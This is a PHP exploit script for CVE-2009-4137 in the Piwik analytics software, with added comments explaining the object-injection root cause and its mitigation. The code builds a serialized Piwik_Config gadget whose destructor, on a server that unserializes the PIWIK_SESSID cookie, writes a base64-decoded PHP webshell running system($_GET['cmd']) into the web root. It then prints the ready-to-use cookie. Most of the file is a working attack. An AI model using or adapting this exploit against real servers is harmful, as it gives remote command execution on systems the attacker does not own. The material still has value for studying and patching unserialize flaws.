<?php
/*
We exploit CVE-2009-4137 by using a PHP object injection of a Piwik_Config object
The __destruct() function of this object writes the config to the path specified in the pathIniFileUserConfig variable
The content of a config file is always prepended by a php showstopper as seen in the following two code-lines of Config.php
$configFile = "; <?php exit; ?> DO NOT REMOVE THIS LINE\n";
$configFile .= "; file automatically generated or modified by Piwik; you can manually override the default values in global.ini.php by redefining them in this file.\n";
To circumvent this, we use php://filter/write=convert.base64-decode and pre-encode our payload. PHP is nice enough to just skip every character that is not part of the base64 alphabet
We then prepend a single character to correct the padding to our payload and write a simple php webshell.
A request to the piwik server with the cookie then triggers the exploit
(You need to url_encode the Cookie if you use manual requests. The '+' and '/' characters of the base64 alphabet must be encoded)
*/
/*
 * Minimal stand-in for the application's Zend_Config class. Only the protected
 * `_data` array is declared; the values below are placeholders that end up in
 * the written config, not credentials read from anywhere. The class name and
 * property layout are what matter for the serialized form — presumably they must
 * match the real class on the target so the object is handled by its normal code
 * paths (not verifiable from this file).
 * NOTE(review): the e-mail literal looks like a forge-masked address, not the
 * original text; treat it as a placeholder.
 */
class Zend_Config {
protected $_data = array(
"login" => "root",
"password" => "rootroot",
"email" => "[email protected]"
);
}
/*
 * Gadget object: a Piwik_Config whose state is arranged so that, once it is
 * unserialized on the target, its __destruct() (see the header comment) writes
 * $userConfig to $pathIniFileUserConfig. What each flag means is taken from the
 * header comment, not from Config.php, which is not on this page.
 */
class Piwik_Config {
protected $configFileUpdated = true;      // presumably makes __destruct() believe there is something to save — confirm against Config.php
protected $doWriteFileWhenUpdated = true; // presumably enables the write at all — confirm against Config.php
protected $correctCwd = ".";
// The php://filter wrapper routes every byte written through a base64 decoder.
// The "; <?php exit; ?>" line the writer prepends (header comment) therefore no
// longer survives as PHP: characters outside the base64 alphabet are dropped and
// the remainder decodes to unrelated bytes. Defensively, the issue is that a
// file path is accepted unvalidated from object state; a config writer should
// use a fixed, non-web-accessible path and refuse stream wrappers.
protected $pathIniFileUserConfig = "php://filter/write=convert.base64-decode/resource=/var/www/piwik/webshell.php";
protected $userConfig = array();
function __construct() { // 'a' for padding
// The array key is presumably emitted into the ini text by the writer; the
// leading 'a' shifts the base64 alignment so the decoder's output lands on the
// intended bytes (header comment). The Zend_Config value only has to serialize.
$this->userConfig["a".base64_encode('<?php system($_GET[\'cmd\']); ?>'."\n")] = new Zend_Config;
}
}
// Build the cookie value: serialize the gadget, base64 it, then URL-encode so the
// '+' and '/' of the base64 alphabet survive in a Cookie header (header comment).
$b64 = base64_encode(serialize(new Piwik_Config));
$urlEncoded = urlencode($b64);
// Root cause from a defender's view: the PIWIK_SESSID value is presumably passed
// to unserialize() on the server, so any autoloadable class with a side-effecting
// __destruct()/__wakeup() becomes a gadget. Mitigation: never unserialize() data
// from a cookie or other client-controlled source — keep session state server-side
// or use json_decode — and validate paths before any destructor-driven write.
// Note the label is echoed without a newline, so it prints on the cookie's line.
echo "Use this cookie";
echo "PIWIK_SESSID=".$urlEncoded."\n";
?>